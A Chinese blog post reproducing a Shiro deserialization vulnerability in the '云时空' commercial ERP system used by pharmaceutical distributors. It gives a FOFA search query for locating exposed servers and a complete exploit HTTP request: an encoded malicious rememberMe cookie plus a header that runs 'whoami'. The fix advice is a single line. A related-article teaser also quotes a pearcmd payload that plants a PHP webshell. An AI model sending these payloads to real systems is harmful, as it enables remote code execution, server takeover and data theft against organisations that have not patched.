云时空社会化商业 ERP 系统 Shiro 反序列化漏洞复现

0x01 产品简介

   时空云社会化商业ERP(简称时空云ERP) ,该产品采用JAVA语言和Oracle数据库, 融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。

0x02 漏洞概述

   云时空社会化商业 ERP 系统存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x03 复现环境

FOFA:app="云时空社会化商业ERP系统"

0x04 漏洞复现 

Exp

GET /static/js/public.js HTTP/1.1
Host: your-ip
Cookie: rememberMe=Y0ZDMzQ3ZUY0YjgzQzJGRfD/yYOCgtFSRejkdE0zNiiBOhIMgn3NN9BbwEQ3P2WALvKFi08Isnf2EPCMrlNsXLP5HflusByGrvRGQI4x3wehRa1z5zGj/crir3jcDk0cza0AyInlFzzZ15VaebrOHES4Op2AsEEsfrxpfG8dWTjzfIeVdlVCHd5fWRq9wZJotwWU9/Ok2mW2RiAAuIDYOIN9QCiSAjsaBnjWpA26wajl387SJPpHwD27KjuO/u0YPAdadqCPYtQzDag9GFSs7T3oSS2q7CuompYNLcghaTulRwliYjqvVGXBSgWmUbmfS4/i2Ev5C/z+gvS0lkcio+9ooR200lxdzYsWUQHw98dEavK6nb2ZXR/sAFv4SyFVBugMEylYkAMRxXMfIs2S0qJLNwSAbOCcCl5MECcLHUo78MjMKtyI93pp/9cMck+f1cvRtFFpa6goKo1r64c24XjZjPKrgZdEb4xpvtEV9qnILxDGgYweefO86zlAobSVlmcOvitSpQS1jomRoB1ybbM9/EO4ARpobWNk4QGkm7C/guulQS9u4mo5bzGiLp4IeDd7hwz0SHh/ePlYIrRISP0rGk89enW3hZro+fvjv5pL0cyUgDFrIWRWAsv3qmqRhr0V9Vb2CaMN82vTTwj673HEjXAKGTMM0LQQIofgxhcY0pqP0sNCsl8YHn0pbBxka31UIFvtJVfqI3FWGvhw0KsVOIFtSsN0/TA8XwY0SEF3+oGcMqY0LNpEmc5XwpI46r/L7M7BLp2+oNqfTmCXTO/S+Qhd25h47x8Atx9L1ps7P319hxM+KaVpbCQrgwcZa+Ai5HihS98YrCny99N7OzrsbWNuozxr2uKQzu1ybSH+rXWwSQPIGZcjtbF8SjIZE/DE0r4G4RULe6/OdJPCl0ASbVZCRgL7ihXdCwnOsBSI3o3TxxDsBTvblZM8W5KB+ubX2/s3nydQQRymUZmAHrYE6xzHviRpiqYIr6d/ZPbhGhfWYS8wa0ShETq5iPi074aTxlGUK5Va6dwR7OGHaGhUg6ZM3JEjESCohjynBSulXrjscTyg9WVsOQSGCE1Hh4oHJ6Q65IUqlk1K4IE4CGcMm1xqHqieBIUj9oMRPCjMrrawfDcFk1zmeeGkN9f04Rt1JPDELugwRExfogC78mvdHUUwM+4p/cyEKD0j/Ws0eWavkvkld9vERo/gSgAive8in4S6YjDrxlW1sPcZPBtXBVJhtZ9Sa/KjKWc5vt7XwjOqenoSXFEafGYiPTb1Knq5jkze+WZK+hmN5fVDTeKDuz6J8F7oykOSGMa/PwTW7XevwzU5zserYOGJ9akUdAjFrVCtydCq05a8+Ht0isGIIwvefcclTlC8D5MV06rCHD/VTTgpSKzAq4lFnnvm9C67giCjTA+yk0JwJE0Ase1oqe7NvL29YsRAA+ZQ2dbI+vE1byXBfOJefW5zEREP4Ml/cqG2wC0/uTbixYmW1TmB/GkcbSrg2kVBvfFMeVgXGYUwkVTeFHokqi7hdhSCI7EEROYpc+c86gowPnNWrc7i1A0gjaiLHjwWo5HtgCIZfv9dCkn3Ht39T0pYw1+3yiPS6mM6XPvHkr8E6EHxI0xyGpXwt7cjrsFsPpTFWT3GgnLsmPG0VxWUXGWF4KuBJ/mNtNNxg/WL0+qIeQiOWjlRhZf2sjHKJODRzPclZ5V+8DQl+5e9rjisxzZYOKS/qFo2sztJqnCVmRAHeRF+hoE21OVe/YIsaF0xaQwkaH4tf3adM0QalUJeS4PdyoC4M1fSN0E2+SewrsVLg1VbA+sAbihobb+0EW05WXgWOfEG314m7xSyZnf4AHYar45D6o7HrAiR+qGDlmfTcMcTzMat7jNbnbm86RgD5VEGk1O5Jd7C9rGv1Iu9jS0OVZ4p0l/rLWHOV3Mfdc/J3th2G9c+uLPMVCfVrt6/HJs+Nu9hcfryTL7fbpVTFNc4FTyhsjUWFFEdd7fMd43xumo4ie6P7vQUAveBrYeE/cYxFfS81CpoRhOqY97SAy+NC7yXoyzkmB3ULkx5mSvnKUJDow3GiVvZL9lsZdQzGEnQS66hC5CLkfk0LDdPsLiKpw1TKyVBhXhQ4yrJ9ehZlOx0l6VslasmXmC/ujlSnANs2UeRtMHrrFXpb0ltqvp8NWnTZVwmxnWbYUch3IYegkoseDb3bhkTxkkk/r7xZyt6Tg825TGfjpTrokRP5B9/CIWGeiwUUEJOoZcFEnvyKWvrgYgm45jtTS7gx05viEVgYyKZG23gC3Wo3uYUFlqxuFuSd+pDO/0LEOTrZOg4djXEQ67vHaPbeJ87eAilkjIE6GL4JvRpZNVysDRp5/INsiciu/SD6F7ubKcC6GvOuzOdVeGWH0nepDDNCW1wDXEXbzZYmYeTOAxi47hYJvZ/PDhAN6KVgetneACTL/oddg396OGRS2D291U9FDLAe+5Qfv3YHcbFpdr/GWmFtj1dnaQjXvTkEfWCrOIWJeNJJxqbXv0JMHmUmfh2YtEKNqHbxkCeck9E/95wPwHgBf6TARjJcJYdYiMl2Iioif9ROpx84Hxzat3joVBsNhCGWCrJ5hM1YKp/zLvCrJEdQ1sItJEITn6VeNIxelU6czqI0YrwTdRTPkxANSwiHwaRdg/qmGFRTbOOFldLwBwHPGwnf7wAP7o+1UqJkyaPn+Ga3Qhq9DEfgh/+QsqDunEc26rXVqIQZQIO4qCoXs6qJpl/4DGLnNP+K6PmwdkPxAdu3HbqtxS9ADYJJxQlylNlIxA3rJRRjNGOUe3jN6HY7zXP9ySqNOTrlt+lDI/qJ8n48CS0B1/bpKjJTcMmQwhpCsjPF45R/DxV88RggfISTSE2RrGCK4XkU8dsi3lSYXpFCmL9GULMFXfaBzPKLiKCP7z1NkODfsJ0HnE7NmXEGCoq413X6jNcHFTYJDifeLkp2eiDztRJ2QrirjJuo0jcxrZpN9Lu3MUZw2PUy+BZnp8RA5gplWf4NSK11tLQ/BeB1jHI6XEZmyteLRnl1XuUzSHp+2xdC2mSHiBKJjFfkhX9HOgq5kAnc+BwzZ29sd1QybrL8kks64OFrrjDWBrZ1OdCCbLDDkhiDtyCcEK2gahXT+Vp4Z1lmnsWRFQDt0x719hhwHyM5tZ4Oq2xvLiPJ17djBOOSZihPc+s5qIW2ZrzRl7XOUmtQWZOJ1ROPgXJgiiC9JkI+1YcBCtCoh/qk3Qqc70+7O5MGHhl0EwFaw9VcCeQbQrwQ36zOQAWfjm+g/ai9638T11tVZqvlyPBFbKNZqtHShu0sSkpgW+LFy5jgWXZ+Oc1OtnGji9xScA8Qm9PDMJOaENmL5SWKO3obPOLLr0soSL8hDyR9mtIPB+KrybQt3tQVe6L/8gDr0ebMpTayxhnVJxTbe1ODeZVmfv7nyZWGmHqHpBxJQcG4dYs9U69pTH6JUppZyfyduuBV8QNLOOx6qDQB4BvoUoVAwBOFn/fIww4/Y8Js7ima8ELy8rtVCM549hnwIukxb33AS9iKa6r7wpKSX0izmHe98FrhpQEKT+Dxv4Y79QiWAMbkaRqehn7Lf/F24unSr5Fa4O+rNqw1wsK9hYmEhDiZBF1paE+6NXHXyy7OlavGEM05O/sX5ABYjvJaGHhO7a/fQCJ7owDQ+VEff3AQsIAB5ZFcMjn6EpU+iVq2LhEUyD0TtM4d2/TDcmNGgCLvFrDY6yKwNEvAvbKIsNFQ3mW/FUcpklf9UfocDax2FBfxoGCN9b2r/LBBN6voU7O9R76JfwDZKXdlTEXEqR4wFRzuSVf27EzMc+CmbeTVja/vE3NQYNWu9KA958Q3tAQu7ny7Dr+j1tFfJS2UqOBDQGwOdxAhwEzzRdspo+2oB41kSPFQW04SDcV0C9RAeeEStqx+KnP8hv8BKfH6oDY82YfMx1AOrFEeXXSg6csJ90mu4Xe16FLsVDT6l5zt8Lc1kfHv/qq26+aVOkYkFTJe6wmIrc/ffYgZjCc4XBYHh77tm7hIeX28bufDnIisc+YeSaR5dpzUqU0Oy7qvOQ5MQLo+n1WBG70zZ80SMBftXnZ+DuodllcvsrOTZpjsNwQBiNgpGRvkywrhTAd7q98VDEDjPlKvt3AMmIH87SFF6I4a+jWRYTDDatxxZYaEK2/Ddfz1kCqVRZf9asNJ4gIM/J1PNkTaD+KMeCirjCzCR/0YFwdZQ2u3Eu/3RWjmvoCdrRZgtv4B8AHkIlxc/bRYwx5BAuTfXnPtV3r9sj9xf67J0SY9EhRmIvXs/IljlGBUllbXu64SOgUzuiYMb7Mjvubj30BxwDVCzKNz1DG76P4PzT8uOprijhkaQfJCvB1ukv5LHWzu+KQKygTSAYxM0bylkWm4i968K+v0t6JX355bxg+Dpph5ZC+wuaiEu6T/jgAE+KAjxdxUIXDwIwTt8QoPr6/vQp5sOKhFry5HskVUDsMaDhN0cQN3FMWmb5nPh74qzasmgT7udGIWhECoPhOfMCM4Ia1X4hhlczZdFVs2NGQMeRus9qdzX8tU2BGrcjwK9lc+/jud0+l85wr7Cou1nGuJpe0C7DkcqS8qpf7d8Tt7osw4+Z8fpzYIbdkTSCNXifHCcIlUZ2MrfHp3d35Perpu2LQfly/7IDQKvMk+/Jo4mIxiY0EdHm02zl8GCVcy7CCr8F3aDVTzyZZ5+RWNC4CT0PIlUYxKG0ttamJHv64gqVgF4gHBxEeoI4dBrzHbegDSSAiN4FiLzr4sp6TFtPAYONeRvkbfPa5zG8I+XdhRIf0BkQqPD3P1jhlEdfe/VK+lfDgG2MvBl6E2tS3MmB3f4AN0KnlQhK6a1ni/LjroxrU8elJcdZ4ZpR28Kyi3qR3j3JQd6laudIRhlIjsFnwCz+TuN0km2qKhFMnfySH+anXcwbWRzWYHXYaZjVtFN1uMefi7I06qToWfOFZqvIXsEb4ueBmDy2lvEXg0KhrPrjU5xdEyxjGqxoXycwuwnpBGUvXnVL0fiwTe3kKwOCaWfUutMdbdst2Mb2DlwLejVp4l/XSbiTPqA+35/6eUmJfUiyFvoivf/SLJy9W8OpC6FCs8nJSd2ILHLj1AlBAnITCwvk5rRn9+R2y9h0eY6leXdqQG38auypcBlAYGFQGWvIKRg3flnK9OZqH06VflWwsDDuC+sze4TmkpTSFmrJqstsuZCBJbpNqVQegdU2mzyEfz9zf4cW2O1WsvaOuVMi+twwwbvy09NvOW+ql01HKZRTtT1H08ZoZOoNhVs1vnSBoSkr1rgA+KMRUtdxzIZ3bL0ea6kPBHeAdkS34LloGmIWIb5J8pNiES1I5JF0Fqz262F/A3KtgYmsnPT85ucp6Zv+giKkpjIY37SqcuY+thlHxOVSMecHzDbb8mjXnrfSlzxWaX+LDuISqKH+941K2Ui54Zk43yGLtqjd6LKHNziCskp7dSvHJKeTZrYjTaS0wDEHcZ5xG9QsSPLLmWhg+mRgP51hfSG3sJP7rWhCX4Jql+vAdKoCLsyH+1ULAM8Xt938iOntwJ/dW/dtfQOC1msW0U6nfty8bxMCcUdDnxIi7ukcwtN9QI7lCVp0OVJc96KFGWagNdumn3AbfwyLRgqnm7XLwxEOGj7+ObEHJB67JosifnQLNw2Q2P7zDGxIURydhAaCsIL20/SmfisaET+jsEQGwvoJHApSA8na1pAGOVqudEciA8vLxHsNTUY8LYF7dzPLTB9d+4oelr8qxI54bnagu0LrsxQO9ZHhmct7swM1SX3zz3bNsUHFfhqFbI0hbrJ5c+UKskfVDiCGXBklRNw+w95jc48qftYWjfkWq3OcmBj2Hzz9KX5j3NzMfj1wwcFm9zO0GIpN2qWYfzUvnY9+lcDtjTOjfykRZBnBIieDYuTMzCgL+KSEeRrHCFGkWTQz3f7KTSgRc8TKFuxR6KusupLSmIr+YSC58dA==
X-Token-Data: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x05 修复建议

官方已出修复方案,联系官方获取修复补丁。http://www.ysk360.com/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/201767.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Linux相关--笔试和面试高频

Linux相关--笔试和面试高频

Linux RedHat公司已经宣布停止维护CentOS服务器操作系统,可以选择华为开源的欧拉系统、阿里开源的龙蜥系统和腾讯开源的TencentOS系统 面试 几个基本的Linux命令 pwd #查看当前绝对路径 结果/home/stu touch / vi编辑器 #创建文件 mkdir -p /home/stu/test #当…
阅读更多...
ESP32-Web-Server 实战编程- 使用 AJAX 自动更新网页内容

ESP32-Web-Server 实战编程- 使用 AJAX 自动更新网页内容

ESP32-Web-Server 实战编程- 使用 AJAX 自动更新网页内容 概述 什么是 AJAX ? AJAX Asynchronous JavaScript and XML(异步的 JavaScript 和 XML)。 AJAX 是一种用于创建快速动态网页的技术。 传统的网页(不使用 AJAX&#…
阅读更多...
鸿蒙原生应用/元服务开发-AGC分发如何下载管理Profile

鸿蒙原生应用/元服务开发-AGC分发如何下载管理Profile

一、收到通知 尊敬的开发者: 您好,为支撑鸿蒙生态发展,HUAWEI AppGallery Connect已于X月XX日完成存量HarmonyOS应用/元服务的Profile文件更新,更新后Profile文件中已扩展App ID信息;后续上架流程会检测API9以上Harm…
阅读更多...
直接套用的软件详细设计说明书

直接套用的软件详细设计说明书

软件开发全套资料过去进主页!
阅读更多...
stm32 计数模式

stm32 计数模式

计数模式 但是对于通用定时器而言,计数器的计数模式不止向上计数这一种。上文基本定时器中计数器的计数模式都是向上计数的模式。 向上计数模式:计数器从0开始,向上自增,计到和自动重装寄存器的目标值相等时,计数器清…
阅读更多...
安卓apk抓包

安卓apk抓包

起因 手机(模拟器)有时候抓不到apk的包,需要借助Postern设置一个代理,把模拟器的流量代理到物理机的burp上。 解决方案 使用Postern代理,把apk的流量代理到burp。 Postern是一个用于代理和网络流量路由的工具&#xf…
阅读更多...
Apache Flink(三):Flink核心特性及应用场景

Apache Flink(三):Flink核心特性及应用场景

🏡 个人主页:IT贫道_大数据OLAP体系技术栈,Apache Doris,Clickhouse 技术-CSDN博客 🚩 私聊博主:加入大数据技术讨论群聊,获取更多大数据资料。 🔔 博主个人B栈地址:豹哥教你大数据的个人空间-豹…
阅读更多...
Linux服务器SSH客户端断开后保持程序继续运行的方法

Linux服务器SSH客户端断开后保持程序继续运行的方法

目录 1. nohup 命令: 2. tmux 或 screen: 3 final shell 断开后服务器如何继续执行令? 方法一:使用 nohup 命令 方法二:将命令放在后台执行 4 你可以使用 jobs 命令查看当前终端中正在后台运行的任务 &#xff…
阅读更多...
【Linux | Docker】内网穿透实现远程访问Nginx Proxy Manager

【Linux | Docker】内网穿透实现远程访问Nginx Proxy Manager

文章目录 前言1. docker 一键安装2. 本地访问3. Linux 安装cpolar4. 配置公网访问地址5. 公网远程访问6. 固定公网地址 前言 Nginx Proxy Manager 是一个开源的反向代理工具,不需要了解太多 Nginx 或 Letsencrypt 的相关知识,即可快速将你的服务暴露到外…
阅读更多...
C++设计模式——原型 (克隆)模式

C++设计模式——原型 (克隆)模式

一、什么是原型模式 Prototype模式说简单点,就是提供了一个clone, 通过已存在对象进行新对象创建。clone()实现和具体的实现语言相关,在C中我们通过拷贝构造函数实现。 那为啥要写clone的接口来实现这个目的呢?直接使…
阅读更多...
关于2024年天津铁道职业技术学院专升本考试报名工作的通知

关于2024年天津铁道职业技术学院专升本考试报名工作的通知

天津铁道职业技术学院关于2024年高职升本科报名工作的通知 根据市高招办关于2024年天津市高职升本科的工作安排,为做好天津铁道职业技术学院2024届毕业生高职升本科考试报名工作,现将相关事项通知如下: 1. 报考资格:2024届天津铁…
阅读更多...
【EI会议征稿】第四届生物信息学与智能计算国际学术研讨会(BIC 2024)

【EI会议征稿】第四届生物信息学与智能计算国际学术研讨会(BIC 2024)

第四届生物信息学与智能计算国际学术研讨会(BIC 2024) 2024 4th International Conference on Bioinformatics and Intelligent Computing 2024年第四届生物信息学与智能计算国际学术研讨会 (BIC 2024)将定于2024年1月26-28日在…
阅读更多...
ora.LISTENER.lsnr状态为Not All Endpoints Registered

ora.LISTENER.lsnr状态为Not All Endpoints Registered

客户的监控反馈有个监听无法连接,登录环境检查发现ora.LISTENER.lsnr的状态为Not All Endpoints Registered,如下 [rootdb2 ~]# crsctl status res -t -------------------------------------------------------------------------------- NAME …
阅读更多...
IDEA如何配置Git 遇到问题的解决

IDEA如何配置Git 遇到问题的解决

新建项目 点击 会变红 会生成.git隐藏文件 配置远程仓库路径:点击Manage Remotes:将远程仓库的链接放到这里: 得到如下样式: 此时提交到本地仓库 点击add,添加到暂存文件: 此时文件变绿&#xf…
阅读更多...
5 面试题--redis

5 面试题--redis

伪客户端: 伪客户端的 fd 属性值为 -1;伪客户端处理的命令请求来源于 AOF ⽂件或者 Lua 脚本,⽽不是⽹络,所以这种客户端不需要套接字连接,⾃然也不需要记录套接字描述符。⽬前 Redis 服务器会在两个地⽅ ⽤到伪客户端…
阅读更多...
【Web】NewStarCTF Week3 个人复现

【Web】NewStarCTF Week3 个人复现

①Include &#x1f350; ?filephpinfo 提示查下register_argc_argv 发现为on LFI包含 pearcmd命令执行学习 pearcmd.php文件包含妙用 ?file/usr/local/lib/php/pearcmd&config-create/<?eval($_POST[a])?>./ha.php ?file./ha post传&#xff1a; asystem…
阅读更多...
云时空社会化商业 ERP 系统 service SQL 注入漏洞复现

云时空社会化商业 ERP 系统 service SQL 注入漏洞复现

0x01 产品简介 时空云社会化商业ERP&#xff08;简称时空云ERP&#xff09; &#xff0c;该产品采用JAVA语言和Oracle数据库&#xff0c; 融合用友软件的先进管理理念&#xff0c;汇集各医药企业特色管理需求&#xff0c;通过规范各个流通环节从而提高企业竞争力、降低人员成本…
阅读更多...
关于MongoDB

关于MongoDB

MongoDB介绍 MongoDB是一个介于关系数据库和非关系数据库之间的产品&#xff0c;是非关系数据库当中功能最丰富&#xff0c;最像关系数据库的。它支持的数据结构非常松散&#xff0c;因此可以存储比较复杂的数据类型。Mongo最大的特点是它支持的查询语言非常强大&#xff0c;其…
阅读更多...
【23种设计模式·全精解析 | 自定义Spring框架篇】Spring核心源码分析+自定义Spring的IOC功能,依赖注入功能

【23种设计模式·全精解析 | 自定义Spring框架篇】Spring核心源码分析+自定义Spring的IOC功能,依赖注入功能

文章目录 ⭐⭐⭐Spring核心源码分析自定义Spring框架⭐⭐⭐一、Spring使用回顾二、Spring核心功能结构1、Spring核心功能2、bean概述 三、Spring IOC相关接口分析1、BeanFactory解析2、BeanDefinition解析3、BeanDefinitionReader解析4、BeanDefinitionRegistry解析5、创建容器…
阅读更多...
科研学习|论文解读——Task complexity and difficulty in music information retrieval

科研学习|论文解读——Task complexity and difficulty in music information retrieval

摘要&#xff1a; 关于音乐信息检索&#xff08;MIR&#xff09;中任务复杂度和任务难度的研究很少&#xff0c;而文本检索领域的许多研究发现任务复杂度和任务难度对用户效率有显着影响。本研究旨在通过探索 i) 任务复杂度和任务难度之间的关系&#xff1b; ii) 影响任务难度的…
阅读更多...
最新文章

Copyright @ 2022~2023